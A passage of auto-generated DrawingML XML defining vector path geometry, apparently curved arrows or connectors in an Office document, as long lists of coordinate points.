                                  <a:pt x="221361" y="5054803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="267970" y="5020526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="300990" y="4992725"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="335280" y="4961331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370840" y="4926927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="407416" y="4889690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445008" y="4850079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483235" y="4808601"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="522224" y="4765510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="590905" y="4688014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="614807" y="4708982"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="624992" y="4670095"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="636397" y="4626584"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5918200" h="5093335">
                                <a:moveTo>
                                  <a:pt x="3194177" y="806069"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3194126" y="803529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3194037" y="799211"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3193923" y="793369"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2779395" y="799211"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2643886" y="803529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2510536" y="809879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2379980" y="818642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2252726" y="830453"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2129536" y="845820"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2010664" y="865251"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1896872" y="889127"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1842008" y="902970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1788668" y="918210"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1736725" y="934720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1686560" y="952754"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1638046" y="972312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1591310" y="993394"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1546225" y="1016127"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1503172" y="1040638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1462151" y="1066927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1423162" y="1095121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1386205" y="1125093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1351407" y="1157097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1318895" y="1191133"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1288669" y="1227201"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1260475" y="1265047"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1234440" y="1304671"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1210310" y="1346200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1188212" y="1389380"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167892" y="1434084"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149477" y="1480312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1132713" y="1528064"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1117600" y="1577340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1104138" y="1627886"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1091946" y="1679829"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1072134" y="1787271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1057376" y="1898332"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1046988" y="2014982"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1040638" y="2134362"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1037717" y="2256790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1037717" y="2381631"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1039863" y="2507869"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1043673" y="2636139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1051090" y="2817495"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1051166" y="2819349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1019429" y="2820670"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1060577" y="2895219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1089088" y="2831973"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1095629" y="2817495"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1063866" y="2818828"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1056398" y="2636520"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1052449" y="2508377"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1050417" y="2381631"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1050417" y="2256790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1053325" y="2135213"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1059688" y="2015998"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1069848" y="1900694"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1084580" y="1789442"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1104163" y="1683588"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1116457" y="1631061"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1129284" y="1582686"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1144143" y="1534058"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1161288" y="1484896"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1179588" y="1439176"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1199642" y="1394968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1221346" y="1352473"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1244930" y="1311808"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1270977" y="1272133"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1298448" y="1235240"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1328127" y="1199857"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1328420" y="1199540"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1328331" y="1199718"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1328597" y="1199451"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1360170" y="1166368"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1394142" y="1135024"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1430883" y="1105128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1468234" y="1078166"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469047" y="1077683"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469174" y="1077582"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469034" y="1077645"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469428" y="1077417"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1508379" y="1052410"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1509585" y="1051750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1552219" y="1027430"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1596644" y="1004951"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1642643" y="984097"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1691005" y="964692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1740789" y="946785"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1793443" y="930059"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1845310" y="915289"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1898103" y="901877"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2011222" y="878090"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2012772" y="877849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2130996" y="858443"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2130869" y="858443"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2251075" y="843432"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2380869" y="831342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2511171" y="822579"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2644394" y="816102"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2779776" y="811911"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2916936" y="809129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3194177" y="806069"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5918200" h="5093335">
                                <a:moveTo>
                                  <a:pt x="3440938" y="133731"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3435794" y="131572"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3362325" y="100711"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3364382" y="131572"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3364433" y="132435"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2566416" y="191643"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2355215" y="211963"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2148967" y="235077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2047875" y="247777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1948561" y="261620"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1850898" y="276225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1755140" y="292100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1661160" y="308864"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1569466" y="327025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1479804" y="346329"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1392555" y="367030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1307719" y="389128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1225550" y="412623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1145921" y="437896"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1069340" y="464566"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="995553" y="493014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="924814" y="523367"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="857377" y="555371"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="793115" y="589407"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="732409" y="625475"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="675132" y="663448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="621665" y="703707"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571881" y="746125"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="526034" y="790829"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="484124" y="837692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445897" y="886841"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="411226" y="937895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="379984" y="990854"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="352171" y="1045972"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="327660" y="1102614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="306197" y="1161161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="287655" y="1221359"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272034" y="1283081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="259207" y="1346454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="248793" y="1411351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="241046" y="1477518"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="235585" y="1544955"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="232283" y="1613662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="231140" y="1683766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="232016" y="1753997"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="234645" y="1825498"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239077" y="1898777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="245008" y="1972437"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="261493" y="2123948"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="282702" y="2276995"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="307975" y="2432177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="336169" y="2589149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="366268" y="2747010"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="397510" y="2905633"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="409956" y="2903093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="378841" y="2744724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="348742" y="2586863"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="320548" y="2430018"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="295275" y="2275078"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="274066" y="2122424"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="257924" y="1973580"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="251904" y="1899666"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247434" y="1826641"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="244741" y="1754505"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="243840" y="1683766"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="244970" y="1614309"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="248119" y="1546174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="253746" y="1478788"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="261251" y="1413802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271462" y="1349806"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271653" y="1348943"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271691" y="1348625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="284365" y="1286141"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="299847" y="1224940"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="318135" y="1165377"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="339369" y="1107795"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="363601" y="1051496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="391058" y="997204"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="391147" y="997013"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="421982" y="944562"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="456285" y="894181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493522" y="846455"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="494017" y="845705"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="501256" y="837692"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535368" y="799541"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="580605" y="755357"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="629450" y="713740"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="629577" y="713613"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="682612" y="673747"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="738987" y="636308"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="739584" y="635927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="797610" y="601433"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="799122" y="600633"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="862977" y="566801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="930021" y="534924"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="999820" y="504990"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1073327" y="476592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1073556" y="476592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1075778" y="475742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1148626" y="450354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149794" y="449999"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1229233" y="424815"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1311021" y="401320"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1395603" y="379349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1482598" y="358775"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1571879" y="339471"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1663446" y="321310"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1757172" y="304546"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1852803" y="288798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1950339" y="274193"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2049526" y="260477"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2149487" y="247777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2149348" y="247777"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2356485" y="224663"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2567559" y="204343"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3000502" y="169926"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3365284" y="145110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3364661" y="135851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3365233" y="144272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3365284" y="145110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3367405" y="176784"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3440938" y="133731"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5918200" h="5093335">
                                <a:moveTo>
                                  <a:pt x="5068659" y="40068"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5068354" y="39624"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5066792" y="37338"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5064074" y="34671"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5028819" y="14224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5023536" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5015611" y="10414"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4968240" y="2667"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4909693" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4887849" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4841240" y="1524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4788700" y="4699"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4789132" y="4699"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4736846" y="9144"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4650740" y="18161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4620768" y="21717"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4496181" y="37846"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4300855" y="65786"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4302633" y="78232"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4560951" y="42164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4652137" y="30734"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4737989" y="21717"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4791100" y="17322"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4841748" y="14224"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4887976" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4909439" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4930000" y="13093"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4949063" y="13970"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4967452" y="15405"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4967097" y="15405"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4984077" y="17322"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4983734" y="17322"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4997640" y="19507"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4998847" y="19773"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5035461" y="30454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5044491" y="35153"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5044846" y="35331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5051476" y="40068"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5051933" y="40386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5051552" y="40068"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5068659" y="40068"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5918200" h="5093335">
                                <a:moveTo>
                                  <a:pt x="5074285" y="62357"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5074183" y="56261"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5073523" y="51562"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5072431" y="47625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5072227" y="46863"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5072126" y="46482"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5071440" y="45085"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5069840" y="41783"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5068875" y="40386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5051933" y="40386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5051806" y="40386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5057279" y="45872"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5059057" y="48488"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5060099" y="50546"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5060188" y="50901"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5060493" y="51562"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5060366" y="51562"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5061077" y="53721"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5061369" y="56261"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5061470" y="62357"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5061204" y="65405"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5061128" y="65786"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5060962" y="66294"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5058664" y="75311"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5038356" y="113233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5004562" y="156337"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4975098" y="188849"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4941570" y="222885"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4905375" y="257810"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4867529" y="292989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4829175" y="327914"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4773041" y="378079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4755388" y="393954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4738243" y="409194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4706747" y="437896"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4704207" y="440372"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4681728" y="417830"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4654677" y="498602"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4735576" y="471805"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4722139" y="458343"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4713173" y="449351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4715383" y="447167"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4746752" y="418719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4837684" y="337312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4876038" y="302387"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4914011" y="267081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4950460" y="232029"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4984242" y="197612"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5014087" y="164719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5039233" y="133858"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5065522" y="92202"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5073650" y="68072"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5074285" y="62357"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5918200" h="5093335">
                                <a:moveTo>
                                  <a:pt x="5917819" y="3495675"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5905119" y="3489325"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5841619" y="3457575"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5841619" y="3489325"/>
                                </a:lnTo>
